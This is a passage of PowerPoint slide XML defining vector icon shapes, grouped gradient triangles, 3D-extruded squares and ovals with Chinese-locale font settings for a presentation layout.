                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
